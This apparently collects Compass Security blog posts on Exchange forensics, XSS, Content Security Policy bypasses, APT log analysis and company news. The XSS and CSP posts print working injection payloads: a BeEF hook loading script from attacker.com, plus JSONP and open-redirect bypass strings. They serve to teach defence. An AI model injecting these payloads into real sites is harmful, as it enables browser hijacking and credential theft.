Exchange Forensics

Introduction

The number one form of communication in corporate environments is email. In 2015 alone, the number of business emails sent and received per day was estimated at over 112 billion [1], and employees spend on average 13 hours per week in their email inbox [2]. Unfortunately, emails are at times also misused for illegitimate communication. When the concept of email was designed, security was not the main focus of its inventors, and some of the design shortcomings are still problematic today. The sender rarely uses encryption, and the receiver cannot check the integrity of unprotected emails. Not even the metadata in the header of an email can be trusted, as an attacker can easily forge this information. Even though many attempts have been made to secure email communication, a lot of unsecured emails are still sent every day. This is one of the reasons why attackers still exploit weaknesses in email communication. In our experience, a lot of forensic investigations involve an attacker either stealing or leaking information via email, or an employee unintentionally opening malware received via email. Once this has happened, there is no way around a forensic investigation in order to answer the key questions: who did what, when and how? Because many corporate environments use Microsoft Exchange as their mailing system, we cover some basics on what kind of forensic artifacts a Microsoft Exchange environment provides.

Microsoft Exchange Architecture

In order to understand the different artifacts, we first take a look at the basic Microsoft Exchange architecture and the components involved. The diagram below shows the architectural concepts of the on-premises version of Exchange 2016. Edge Transport servers build the perimeter of the email infrastructure; they handle external email flow and apply antispam and email flow rules. Database availability groups (DAGs) form the heart of the Exchange environment: they contain a group of Mailbox servers and host a set of databases. The Mailbox servers contain the transport services that are used to route emails. They also contain the client access service, which is responsible for routing or proxying connections to the corresponding backend services on a Mailbox server; clients never connect directly to the backend services. When a client sends an email through the Microsoft Exchange infrastructure, it always traverses at least one Mailbox server.

[Figure: Exchange 2016 Architecture, Microsoft [3]]

Compliance Features

Microsoft Exchange provides multiple compliance features. Each of these compliance features provides a different set of information to an investigator, and it is important to have a basic understanding of their behavior in order to know which feature can answer which question. The most important compliance features are covered in the following paragraphs.

Message Tracking

The message tracking compliance feature writes a record of all activity into a log file as emails flow through Mailbox servers and Edge Transport servers. These logs contain details about the sender, recipients, message subject, date and time. By default, message tracking logs are kept for a maximum of 30 days, or until the log directory exceeds 1000 MB, whichever comes first.

The following example shows the message tracking log entries created when the user “alice@csnc.ch” sends a message with the MessageSubject “Meeting” to the user “bob@csnc.ch”. Note that in this example both users have their mailboxes on the same server.

EventId    Source      Sender        Recipients    MessageSubject
-------    ------      ------        ----------    --------------
NOTIFYMAPI STOREDRIVER               {}
RECEIVE    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
SUBMIT     STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
HAREDIRECT SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
RECEIVE    SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
AGENTINFO  AGENT       alice@csnc.ch {bob@csnc.ch} Meeting
SEND       SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
DELIVER    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting

The message content is not stored as part of the message tracking logs. By default, the subject line of an email message is stored in the tracking logs; however, this can be disabled in the configuration settings. [4]
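Because the tracking logs are plain CSV files, they lend themselves to simple scripting during an investigation. The following Python sketch traces a message through such records; note that the field names and the sample log are simplified illustrations, not the exact on-disk format Exchange produces:

```python
import csv
import io

# Simplified sample mirroring the EventId/Source/Sender columns shown
# above; real message tracking logs contain many more fields.
SAMPLE_LOG = """event-id,source,sender-address,recipient-address,message-subject
RECEIVE,STOREDRIVER,alice@csnc.ch,bob@csnc.ch,Meeting
SUBMIT,STOREDRIVER,alice@csnc.ch,bob@csnc.ch,Meeting
SEND,SMTP,alice@csnc.ch,bob@csnc.ch,Meeting
DELIVER,STOREDRIVER,alice@csnc.ch,bob@csnc.ch,Meeting
"""

def trace_message(log_text, subject):
    """Return the ordered list of event-ids recorded for one subject."""
    reader = csv.DictReader(io.StringIO(log_text))
    return [row["event-id"] for row in reader
            if row["message-subject"] == subject]

print(trace_message(SAMPLE_LOG, "Meeting"))
# ['RECEIVE', 'SUBMIT', 'SEND', 'DELIVER']
```

A completed delivery should end with a DELIVER event; a trace that stops at SEND or SUBMIT can hint at where in the flow a message was lost or dropped.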

Single Item Recovery

Single Item Recovery is a compliance feature that essentially allows you to recover individual emails without having to restore them from a full database backup. If a user deletes an email in Outlook, it goes to the “Deleted Items” folder. When the user deletes this email from the “Deleted Items” folder, the email will be placed into the “Dumpster” (soft delete). The following screenshots show how the “Dumpster” can be accessed:

[Screenshot: Recover deleted items in Outlook, Microsoft [5]]

When clicking on the “Recover Deleted Items” trash symbol, the “Dumpster” gets opened as shown on the following screenshot:

[Screenshot: Recover deleted items in Outlook, Microsoft [5]]

From the “Dumpster”, messages can either be recovered or purged completely (hard delete). Of course, purged messages can still be recovered if a backup of the mailbox is available. When Single Item Recovery is enabled, emails remain recoverable for administrators even if the mailbox owner deletes the messages from the inbox, empties the “Deleted Items” folder and then purges the content of the “Dumpster”. Single Item Recovery is not enabled by default and has to be enabled prior to the date of an investigation. In order to recover a message, the following information is needed [6]:

  • The source mailbox that needs to be searched.
  • The target mailbox into which the emails will be recovered.
  • Search criteria such as sender, recipient or keywords in the message.

With the information above, an email can be found using the Exchange Management Shell (EMS) as shown in the following example.

Search-Mailbox "Alice" -SearchQuery "from:Bob" -TargetMailbox "Investigation Search Mailbox" -TargetFolder "Alice Recovery" -LogLevel Full

In-Place Hold

In-Place Hold can be used to preserve mailbox items. If this compliance feature is enabled, an email is kept even if it was purged by a user (deleted from the “Dumpster” folder). Also, if an item is modified, a copy of the original version is retained. In-Place Hold is usually activated during investigations in order to preserve the mailbox content of an individual. The individuals do not notice that they are “on hold”. A query with parameters can be used to granularly define the scope of items to hold. By default, In-Place Hold is disabled, and if neither Single Item Recovery nor In-Place Hold is enabled, an email is permanently deleted once a user purges (deletes) it from the “Dumpster”.

Mailbox Auditing

Mailboxes can contain sensitive information, including personally identifiable information (PII). Therefore it is important to track who logged on to a mailbox and which actions were taken. It is especially important to track access to mailboxes by users other than the mailbox owner, the so-called delegates.

By default, mailbox auditing is disabled; when enabled, it requires more space in the corresponding mailbox. If enabled, one can specify which user actions (for example accessing, moving, or deleting a message) are logged per logon type (administrator, delegate user, or owner). Audit log entries also include further important information such as the client IP address, host name, and processes or clients used to access the mailbox. If the auditing policy is configured to only include key records, such as sending or deleting items, there is no noticeable impact in terms of storage and performance.

Administrator Auditing

This compliance feature is used to log changes that an administrator makes to the Exchange server configuration. By default, this logging is enabled and the entries are kept for 90 days. Changes to the administrator auditing configuration are always logged. The log entries are stored in a hidden, dedicated mailbox which cannot be opened in Outlook or OWA.

Others

Exchange email flow rules, also known as transport rules, can be used to look for specific conditions in messages that pass through an Exchange server. These rules are similar to the inbox rules a lot of email clients offer. The main difference is that email flow rules take action on messages while they are in transit, as opposed to after the message is delivered. Furthermore, email flow rules have a richer set of conditions, exceptions and actions, which provides the flexibility to implement many types of messaging policies. [7]

Journaling allows recording a copy of all email communications and sending it to a dedicated mailbox on an Exchange server. Archiving, on the other hand, can be used to back up data, removing it from its native environment and storing a copy on another system. Finally, there is always the option of a full backup of an Exchange database. This creates and stores a complete copy of the database file as well as the transaction logs.

Summary

As we have seen, Microsoft Exchange provides various compliance features that help during forensic investigations involving email analysis. Having an understanding of which artifacts are available is key. The following table summarises the compliance features discussed in this post:

[Table: Summary of the compliance features discussed in this post]

Courses and Beer-Talk Reference

In order to directly share our experience in this field, we chose “Exchange Forensics” as the topic for our upcoming beer talks. Don’t hesitate to sign up if you are interested. For more information, click on the link next to the location you would like to attend:

If you would like to dive even deeper, we provide the Security Training: Forensic Investigations. It covers:

  • Introduction to forensic investigations
  • Chain of custody
  • Imaging
  • Basics of file systems
  • Traces in slack space
  • Traces in office documents
  • Analysis of Windows systems
  • Analysis of network dumps
  • Analysis of OSX systems
  • Analysis of mobile devices
  • Forensic readiness
  • Log analysis

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-forensik-investigation/ or get in touch if you have questions.

Sources and References:

[0] E-mail Forensics in a Corporate Exchange Environment, Nuno Mota, http://www.msexchange.org/articles-tutorials/exchange-server-2013/compliance-policies-archiving/e-mail-forensics-corporate-exchange-environment-part1.html

[1] Email-Statistics-Report-2015-2019, The Radicati Group, Inc., http://www.radicati.com/wp/wp-content/uploads/2015/02/Email-Statistics-Report-2015-2019-Executive-Summary.pdf

[2] the-social-economy, McKinsey & Company, http://www.mckinsey.com/industries/high-tech/our-insights/the-social-economy

[3] Exchange 2016 Architecture, Microsoft, https://technet.microsoft.com/de-ch/library/jj150491(v=exchg.160).aspx

[4] Message Tracking, Microsoft, https://technet.microsoft.com/en-us/library/bb124375(v=exchg.160).aspx

[5] Recover deleted items in Outlook, Microsoft, https://support.office.com/en-us/article/Recover-deleted-items-in-Outlook-2010-cd9dfe12-8e8c-4a21-bbbf-4bd103a3f1fe

[6] Recover deleted messages in a user’s mailbox, Microsoft, https://technet.microsoft.com/en-us/library/ff660637(v=exchg.160).aspx

[7] Mail flow or transport rules, Microsoft, https://technet.microsoft.com/en-us/library/jj919238(v=exchg.150).aspx

Cross-Site Scripting

Cross-Site Scripting is harmless? Think again!

Cross-Site Scripting, oftentimes referred to as “XSS”, is a common vulnerability of web applications. The vulnerability arises when a web application insufficiently encodes user-provided data before displaying it back to the user. If this is the case, attackers are able to inject malicious code, for instance JavaScript, into the affected website.

One of our main tasks at Compass Security is testing web applications for security issues. Thus, we can safely say that many current web applications are affected by this type of vulnerability, even though protecting against it is simple. For simplicity reasons, XSS is usually depicted as a popup window displaying simple text.

Such a popup would be induced by the following code:

<script>alert(0)</script>

The entire attack would look as follows, given that the parameter param is vulnerable. Assume that the following code is used by a web application without employing output encoding:

<input type="text" name="param" value="user_input">

Here, user_input is the non-output encoded data provided by the user.

Then, an attacker can exploit this by setting param to

"><script>alert(0)</script><!--

which will lead to the following being sent to the user:

<input type="text" name="param" value=""><script>alert(0)</script><!--">

resulting in the above popup being displayed.

When discussing XSS with customers, one of the more common statements we hear is: “this issue is harmless; it only displays text in a popup window”. This is not true, however, since XSS is far more powerful than often suspected: it allows an attacker to take control over the victim’s browser, the victim being the user who visits the attacked website. Common attack vectors include stealing the victim’s session cookie if it is not protected by the so-called HttpOnly flag. Further, the affected website can be manipulated so that the user is redirected to a phishing website, allowing the attacker to obtain the user’s credentials. Finally, if the victim’s browser is outdated and contains known vulnerabilities, these can be exploited directly via Cross-Site Scripting and, if successful, lead to the victim’s computer being compromised.

Many of the above-mentioned attack vectors can be easily tested using BeEF, the Browser Exploitation Framework (http://beefproject.com/). This framework provides many attack vectors that can be used by including just one malicious JavaScript file into the vulnerable website. Hence, instead of the above code ("><script>alert(0)</script><!--), the following would be injected:

"><script src=http://attacker.com/hook.js></script><!--

where attacker.com is an attacker-controlled website and hook.js is the malicious JavaScript file that will allow the BeEF server on the attacker’s machine to take control over the victim’s browser.

Once the victim’s browser executes the injected JavaScript, it is “hooked”, that is, in the attacker’s control, allowing them to obtain all kinds of information such as the user’s cookies, browser type and version, etc.:

[Screenshot: BeEF overview of the hooked browser]

Among many different types of attack vectors, BeEF allows, e.g., displaying a password prompt to the user (in the user’s browser):

[Screenshot: BeEF password prompt displayed in the victim’s browser]

Once the user has entered their password, it is sent to the attacker:

[Screenshot: BeEF showing the captured password]

How to protect against such attacks?

Simple! Just encode user-provided data before echoing it back to the user. An effective method is to use HTML entities:
" is encoded as &quot;,
< is encoded as &lt;,
and so forth (for a detailed explanation, refer to https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).
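As a minimal illustration of this output encoding, here is how the payload from above would be neutralized in Python using the standard library (the tag and parameter name are just examples):

```python
import html

# Output-encode user input before embedding it in an HTML attribute.
# html.escape() with quote=True converts &, <, >, " and ' to entities.
user_input = '"><script>alert(0)</script><!--'
encoded = html.escape(user_input, quote=True)
print(f'<input type="text" name="param" value="{encoded}">')
# <input type="text" name="param" value="&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;&lt;!--">
```

The encoded value can no longer break out of the attribute context, so the browser renders it as plain text instead of executing it.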

If you want to see this and many more typical web application vulnerabilities, try them out yourself, and learn how to defend against them, register for our next Web Application Security course:

https://www.compass-security.com/services/security-trainings/

The Web Application Security (Basic/Advanced) courses will introduce all major web application attack vectors via theory and hands-on challenges in our Hacking-Lab:

https://www.hacking-lab.com/

Content-Security-Policy: misconfigurations and bypasses

Introduction

The Content Security Policy (CSP) is a security mechanism web applications can use to reduce the risk of attacks based on XSS, code injection or clickjacking. Using different directives, it is possible to lock down web applications by implementing a whitelist of trusted sources from which web resources like JavaScript may be loaded. Currently, CSP version 2 is supported by Firefox, Google Chrome and Opera, whereas other browsers provide limited support or no support at all (Internet Explorer) [4].

The CSP has two modes of operation [7]: enforcing and report-only. The first one can be used to block and report attacks whereas the second one is used only to report abuses to a specific reporting server. In this blog post, we will focus only on the enforcing mode.

In order to take effect, the policy has to be included in each HTTP response as a header (“Content-Security-Policy:”). The browser then parses the CSP and checks whether every object loaded in the page adheres to the given policy. To specify these rules, the CSP provides different directives [5]:

  • script-src: defines valid sources of JavaScript
  • object-src: defines valid sources of plugins, like <object> elements
  • img-src: defines valid sources of images
  • style-src: defines valid source of stylesheets
  • report-uri: the browser will POST a report to this URI in case of policy violation

Each of these directives must have a value assigned, which is usually a list of sources from which resources are allowed to be loaded. If a directive is omitted, the default behavior is to allow everything (“*”) without restrictions [9]. A basic example of a valid CSP is shown below:

Content-Security-Policy: default-src 'self'; script-src compass-security.com

The directive “default-src” is set to 'self', which means same origin: all resources without an explicit directive are allowed to be loaded only from the same origin, in this case “blog.compass-security.com”. Setting the “default-src” directive can be a good start when deploying a CSP, as it provides a basic level of protection. “script-src” is used to allow all JavaScript to be loaded from the domain “compass-security.com”, via HTTP (https:// should be explicitly specified) and without allowing subdomains. Subdomains could be specified directly (e.g. sub.compass-security.com) or using the “*” wildcard (*.compass-security.com).
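The header value is simply a semicolon-separated list of directives, each followed by its space-separated sources. As an illustration of how such a policy string is assembled (a hypothetical helper, not an official API), consider:

```python
def build_csp(directives):
    """Serialize a directive mapping into a Content-Security-Policy value.
    Each directive name is followed by its space-separated source list;
    directives are joined with '; '."""
    return "; ".join(f"{name} {' '.join(sources)}"
                     for name, sources in directives.items())

policy = build_csp({
    "default-src": ["'self'"],
    "script-src": ["compass-security.com"],
})
print("Content-Security-Policy:", policy)
# Content-Security-Policy: default-src 'self'; script-src compass-security.com
```

Generating the header programmatically like this avoids typos such as stray colons inside directive names, which browsers silently reject.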

Misconfigurations and Bypasses

Even though it is possible to have a good level of control over the policy, errors in the definition of directives may lead to unexpected consequences. Misconfiguration or ambiguities can render the policy less efficient or easy to bypass. In addition, the functionality of the application could also be broken. The following example illustrates what can happen if “default-src” is omitted:

Content-Security-Policy: script-src compass-security.com

Now, all the scripts with source “compass-security.com” are allowed. But what about the other objects like stylesheets or flash applets? The policy above can be bypassed for example using this payload, which triggers an alert box using a Flash object[7]:

'><object type=">
">'><object type="application/x-shockwave-flash"
data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/
assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

One other common mistake is the inclusion of the dangerous “unsafe-inline” or “unsafe-eval” source expressions. These allow the execution of potentially malicious JavaScript directly via “<script>” tags or eval():

Content-Security-Policy: default-src 'self'; script-src compass-security.com 'unsafe-inline';

This policy defines the default source as “self” and allows the execution of script from “compass-security.com” but, at the same time, it allows the execution of inline scripts. This means that the policy can be bypassed with the following payload [7]:

">'><script>alert(1337)</script>

The browser will then parse the JavaScript and execute the injected malicious content.

Besides the trivial misconfigurations shown above, there are other tricks used to bypass the CSP that are less commonly known. These make use, for example, of JSONP (JSON with padding) or open redirects. Let’s take a look at JSONP bypasses.

If the CSP whitelists a JSONP endpoint, it is possible to take advantage of the callback parameter to bypass the CSP. Assume that the policy is defined as follows:

Content-Security-Policy: script-src 'self' https://compass-security.com;

The domain compass-security.com hosts a JSONP endpoint, which can be called with the following URL:

https://compass-security.com/jsonp?callback={functionName}

Now, what happens if the {functionName} parameter contains valid JavaScript code which could potentially be executed? The following payload represents a valid bypass [7]:

">'><script src="https://compass-security.com/jsonp?callback=alert(1);u">

The JSONP endpoint will then parse the callback parameter, generating the following response:

alert(1);u({……})

The JavaScript before the semicolon, alert(1), will be executed by the client when processing the response received.
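The root cause can be sketched with a toy JSONP endpoint. The function below is a hypothetical, deliberately naive server-side implementation (not code from any real endpoint): it interpolates the callback name verbatim, which is exactly what makes the bypass possible.

```python
import json

def jsonp_response(callback, data):
    """Naive JSONP endpoint: the callback name is interpolated verbatim,
    without validating that it is a plain JavaScript identifier."""
    return f"{callback}({json.dumps(data)})"

# Legitimate use:
print(jsonp_response("handleUsers", {"user": "alice"}))
# handleUsers({"user": "alice"})

# With an attacker-chosen callback, arbitrary JS lands in the response:
print(jsonp_response("alert(1);u", {"user": "alice"}))
# alert(1);u({"user": "alice"})
```

A defensive endpoint would reject any callback that is not a strict identifier (e.g. matching `[A-Za-z_][A-Za-z0-9_]*`), which closes this bypass.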

URLs with open redirects could also pose problems if whitelisted in the CSP. Imagine if the policy is set to be very restrictive, allowing only one specific file and domain in its “script-src” directive:

Content-Security-Policy: default-src 'self'; script-src https://compass-security.com/myfile.js https://redirect.compass-security.com

At first sight, this policy seems very restrictive: only myfile.js can be loaded, along with all scripts originating from “redirect.compass-security.com”, a site we trust. However, redirect.compass-security.com performs open redirects through a parameter in the URL. This could be a possible option to bypass the policy [7]:

">'><script src="https://redirect.compass-security.com/redirect?url=https%3A//evilwebsite.com/jsonp%2Fcallback%3Dalert">

Why is it possible to bypass the CSP using this payload? The CSP does not check the landing page after a redirect occurs, and as the source of the script tag, “https://redirect.compass-security.com”, is whitelisted, no policy violation is triggered.

This is only a small subset of possible CSP bypasses. If you are interested, many more can be found at [6] or [7].

The “nonce” directive

Besides the whitelist mechanism using URLs, CSP2 offers other techniques that can be used to block code injection attacks. One of these is the use of “nonces”.

Nonces are randomly generated values that are declared in the CSP and included in the <script> or <style> tags of legitimate resources, providing a mapping between the policy and the client’s browser. An attacker injecting a payload containing a script tag has no knowledge of the nonce previously exchanged between the client and the server, so the CSP detects this and throws a policy violation. A possible configuration of a CSP with nonces could be:

Content-Security-Policy: script-src 'nonce-eED8tYJI79FHlBgg12'

The value of the nonce (which should be random, unpredictable, generated with every response, and at least 128 bits long [10]) is “eED8tYJI79FHlBgg12”.

This value should be then passed to each script tag included in our application’s pages:

<script src="http://source/script.js" nonce="eED8tYJI79FHlBgg12"></script>

The browser then parses the CSP, checks whether the included scripts have a matching nonce value, and blocks those that do not include a valid nonce. This technique works great against stored XSS, as the attacker cannot include valid nonces at injection time. Another advantage is that there is no need to maintain whitelists of allowed URLs, as the nonce acts as an access token for the <script> tag and not necessarily for the source of the script. It is also possible to use hashes in order to identify the content of each <script> element inside the page; more information about this feature can be found at [8].
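Generating a suitable nonce per response is straightforward. The sketch below (an illustration, not a complete CSP implementation; the script path is a placeholder) produces a fresh 128-bit value and embeds it in both the header and the tag:

```python
import base64
import os

def make_nonce(nbytes=16):
    """Generate a fresh CSP nonce: 16 bytes (128 bits) of randomness,
    base64-encoded so it is safe to embed in a header and an attribute."""
    return base64.b64encode(os.urandom(nbytes)).decode("ascii")

# A new nonce must be generated for every response, never reused.
nonce = make_nonce()
header = f"Content-Security-Policy: script-src 'nonce-{nonce}'"
tag = f'<script src="/static/app.js" nonce="{nonce}"></script>'
print(header)
print(tag)
```

The security of the scheme rests entirely on the nonce being unpredictable and single-use; reusing a nonce across responses would let an attacker replay it in an injected tag.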

Conclusion

We have seen that the CSP is a very useful tool web developers can use to gain better control over the loaded resources. The different directives provide flexibility to allow or deny potentially dangerous web resources inside web pages. However, it is also easy to make errors if too many URLs are whitelisted (e.g. hidden JSONP endpoints). Here at Compass we encourage the use of the CSP as an additional barrier against web threats. Nonetheless, I would like to stress that the first protection against code injection should always be solid input/output validation, which also helps against other common attacks like SQL injection.

If you would like to get more information about how web applications should be protected, or you want to deepen your web security knowledge we provide different trainings:

We are also offering trainings in other areas of IT Security. You can check the different topics here:

Sources & References

  1. https://www.owasp.org/index.php/Content_Security_Policy
  2. https://www.w3.org/TR/CSP2/#intro
  3. https://w3c.github.io/webappsec-csp/#match-element-to-source-list
  4. http://caniuse.com/#search=Content%20Security%20Policy%20Level%202
  5. http://content-security-policy.com/
  6. https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it’s-CSP!%22.
  7. http://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
  8. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
  9. http://www.html5rocks.com/en/tutorials/security/content-security-policy/
  10. https://www.w3.org/TR/CSP/#source_list

APT Detection & Network Analysis

Until recently, the majority of organizations believed that they did not have to worry about targeted attacks because they considered themselves to be “flying under the radar”. The common belief has been: “We are too small; only big organizations like financial service providers, the military industry, energy suppliers and government institutions are affected”.

However, this assumption has been proven wrong at least since the detection of Operation Shady RAT [0], DarkHotel [1] or the recent “RUAG Cyber Espionage Case” [2]. The analysis of the Command & Control (C&C) servers of Shady RAT revealed that a large-scale operation was run from 2006 to 2011. During this operation, 71 organizations (private and public) were targeted and spied on. It is assumed that these so-called Advanced Persistent Threats (APTs) will only increase in the near future.

We at Compass Security are often asked to help finding malicious actions or traffic inside corporate networks.

The infection is, in most cases, a mix of social engineering methods (for example spear phishing) and the exploitation of vulnerabilities; this varies from case to case. We often observe in proxy logs that employees were lured into visiting phishing sites designed to look exactly like the corporation’s Outlook Web Access (OWA) or similar applications/services used by the targeted company.

Typically, this is not something you can prevent exclusively with technical measures – user awareness is the key here! Nevertheless, we are often called to investigate when there still is some malware activity in the network. APT traffic detection can then be achieved with the correlation of DNS, mail, proxy, and firewall logs.

Network Analysis & APT Detection

To analyze a network, Compass Analysts first have to know the network’s topology to get an idea of how malware (or a human attacker) might communicate with external servers. Almost every attacker is going to exfiltrate data at some point in time. This is the nature of corporate/industrial espionage. Further, it is important to find out whether the attacker gained access to other clients or servers in the network.

For the analysis, log files are crucial. Many companies are already collecting logs on central servers [3], which speeds up the investigation process, since administrators don’t have to collect the logs from many different sources (which sometimes takes weeks), and off-site logs are more difficult to clear by attackers.

To analyze logs and sometimes traffic dumps, we use different tools such as ELK (Elasticsearch, Logstash, Kibana), Splunk and Moloch.

ELK offers many advantages when it comes to clustering and configuration, but it doesn’t offer many pre-configured log parser rules. If you are lucky, you can find some for your infrastructure on GrokBase [4]. Otherwise, there are plenty of tools helping you to build them on your own, such as the Grok Debugger [5].

However, when an analysis has to be kick-started fast and there is no time to configure large rulesets, Splunk comes with a wide range of pre-configured parsers.

After we gathered all logs (and in some cases traffic dumps), we feed them into Splunk/ELK/Moloch for indexing.

In a first step, we try to clean the data set by removing noise. To achieve this, we identify known-good traffic patterns and exclude them. Of course, it is not always straightforward to distinguish between normal and suspicious traffic, as some malware uses, for example, Google Docs for exfiltration. It takes some time to understand what the usual traffic in a network looks like. To clean the data set even more, we then look for connections to known malware domains.

There are plenty of publicly available blocklists for this purpose.

If we are lucky, the attacker used infrastructure provided by known malware service providers (individuals and organizations are selling special services just for the purpose of hosting malware infrastructure). But more sophisticated attacks will most likely use their own infrastructure.
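The blocklist matching step can be sketched as follows. Domains, IP addresses and log entries below are purely illustrative (using reserved `.example` names), not real indicators of compromise:

```python
# Flag proxy-log entries whose destination appears on a domain blocklist.
BLOCKLIST = {"evil-c2.example", "dropzone.example"}

proxy_log = [
    ("10.0.0.12", "www.google.com"),
    ("10.0.0.12", "evil-c2.example"),
    ("10.0.0.57", "updates.vendor.example"),
]

def match_blocklist(entries, blocklist):
    """Return entries whose destination domain (or a parent domain) is listed."""
    hits = []
    for src, domain in entries:
        parts = domain.split(".")
        # Check the domain itself and every parent domain, so that
        # sub.evil-c2.example also matches a listing of evil-c2.example.
        candidates = {".".join(parts[i:]) for i in range(len(parts) - 1)}
        if candidates & blocklist:
            hits.append((src, domain))
    return hits

print(match_blocklist(proxy_log, BLOCKLIST))
# [('10.0.0.12', 'evil-c2.example')]
```

Checking parent domains matters in practice, because C&C infrastructure frequently rotates subdomains under a single registered domain.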

After cleaning the data sets, we look for anomalies in the logs (e.g. large numbers of requests, single requests, big DNS queries, etc.). Some malware is really noisy and, as a consequence, easy to find. Some samples connect to their C&C servers at high frequency. Other samples request commands from C&C servers at regular time intervals (Friday 20:00, for example). Others connect just once.
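Regular beacon intervals can be spotted statistically: if the inter-arrival times of a host’s connections barely vary, the traffic looks machine-generated rather than human. A rough sketch of such a heuristic (the timestamps are invented sample data, and real investigations would tune the thresholds):

```python
from statistics import mean, pstdev

def beaconing_score(timestamps):
    """Coefficient of variation of inter-arrival times (in seconds).
    Values close to zero indicate machine-like, regular beaconing."""
    deltas = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(deltas) < 2 or mean(deltas) == 0:
        return None  # not enough data points to judge
    return pstdev(deltas) / mean(deltas)

# A sample beaconing roughly every 600 s vs. a human browsing pattern:
beacon = [0, 600, 1200, 1801, 2400, 3000]
human = [0, 30, 1200, 1260, 4000, 4005]
print(beaconing_score(beacon))  # close to 0
print(beaconing_score(human))   # much larger
```

In practice, this score would be computed per source/destination pair over proxy or firewall logs, and only pairs below some threshold would be escalated for manual review.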

Sometimes we also detect anomalies in the network infrastructure which are caused by employees, for example heavy usage of cloud services such as Google Drive or Dropbox. Often these turn out to be so-called false positives.

To share our experiences and knowledge in this field, we created the Security Training: Network Analysis & APT.

This training will cover:

  • Configuration of evidence (What logs are needed?)
  • Static and Dynamic Log Analysis with Splunk
    • Splunk Basics and Advanced Usage
    • Detecting anomalies
    • Detecting malicious traffic
  • Attack & Detection Challenges

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-network-anlysis-apt/ or get in touch if you have questions.

The next upcoming training is on 22. and 23. September 2016 in Jona, click here to register.

Sources & References:
[0] Operation Shady RAT, McAfee, http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
[1] The Darkhotel APT, Kaspersky Lab Research, https://securelist.com/blog/research/66779/the-darkhotel-apt/
[2] Technical Report about the Malware used in the Cyberespionage against RUAG, MELANI/GovCERT, https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html
[3] “Challenges in Log-Management”, Compass Security Blog, http://blog.csnc.ch/2014/10/challenges-in-log-management/
[4] GrokBase, http://grokbase.com/
[5] Grok Debugger, https://grokdebug.herokuapp.com/
[x.0] APT Network Analysis with Splunk, Compass Security, Lukas Reschke, https://www.compass-security.com/fileadmin/Datein/Research/White_Papers/apt_network_analysis_w_splunk_whitepaper.pdf
[x.1] Whitepaper: Using Splunk To Detect DNS Tunneling, Steve Jaworski, https://www.sans.org/reading-room/whitepapers/malicious/splunk-detect-dns-tunneling-37022

Windows Phone – Security State of the Art?

Compass Security recently presented its Windows Phone and Windows 10 Mobile research at the April 2016 Security Interest Group Switzerland (SIGS) event in Zurich.

The short presentation highlights the attempts made by our Security Analysts to bypass the security controls provided by the platform and further explains why bypassing them is not a trivial undertaking.

Windows 10 Mobile, which was publicly released on 17th March 2016, has further tightened its hardware-based security defenses, introducing multiple layers of protection that start already at boot time. Minimum hardware requirements therefore include UEFI Secure Boot support and a Trusted Platform Module (TPM) conforming to the 2.0 specification. When connected to an MDM solution, the device can use the TPM for the new health attestation service to provide conditional access to the company network and its resources, and to trigger corrective measures when required.

Compared to earlier Windows Phone versions, Windows 10 Mobile finally allows end users without access to an MDM solution or ActiveSync support to enable full disk encryption based on Microsoft BitLocker technology. Companies using an MDM solution also have fine-grained control over the encryption method and cipher strength used. Similar control can be applied to TLS cipher suites and algorithms.

Newly introduced features include biometric authentication using Windows Hello (selected premium devices only for the moment) and Enterprise Data Protection (EDP), which helps separate personal and enterprise data and serves as a data loss protection solution. EDP requires the Windows 10 Mobile Enterprise edition and is currently available to a restricted audience for testing purposes.

Similar to Windows 10 for workstations, the Mobile edition updates automatically. Users of the Windows 10 Mobile Enterprise edition, however, have the option to postpone the downloading and installation of updates.

In addition, the presentation introduces the Windows Bridges that help developers port existing mobile applications to the new platform. While a preview version for iOS (Objective-C) has been made publicly available, Microsoft recently announced that the Windows Bridge for Android project has been cancelled. In the same week, Microsoft announced the acquisition of Xamarin, a cross-platform development solution provider, to ease the development of universal applications for the mobile platform.

The slides of the full presentation can be downloaded here.

References:

This blog post resulted from internal research which has been conducted by Alexandre Herzog and Cyrill Bannwart.

Compass Security nominated by Prix SVC

Compass Security proudly announces its nomination for the Prix SVC (Swiss Venture Club) award 2016. Out of 180 companies, Compass Security was selected as one of the most innovative companies in the eastern region of Switzerland. Because the award ceremony is broadcast by TVO, we had to slip into a tuxedo and play the “license to hack” story. Please watch the teaser video on YouTube!


The award ceremony will be held on March 10th, 2016 at the Olma Hallen in St. Gallen. We don’t yet know the final score but we will keep you updated.

Thank you for the trust and confidence you have in Compass Security!!

Walter & Ivan

 

Presentation on SAML 2.0 Security Research

Compass Security invested quite some time last year in researching the security of single sign-on (SSO) implementations. Often SAML (Security Assertion Markup Language) is used to implement a cross-domain SSO solution. The correct implementation and configuration is crucial for a secure authentication solution. As discussed in earlier blog articles, Compass Security identified vulnerabilities in SAML implementations with the SAML Burp Extension (SAML Raider) developed by Compass Security and Emanuel Duss.

Antoine Neuenschwander and Roland Bischofberger are happy to present their research results and SAML Raider during the upcoming

Beer-Talks:
– January 14, 2016, 18:00-19:00, Jona
– January 21, 2016, 18:00-19:00, Bern

Free entrance, food and beverage. Registration required.

Get more information in our Beer-Talk page and spread the word. The Compass Crew is looking forward to meeting you.

Subresource Integrity HTML Attribute

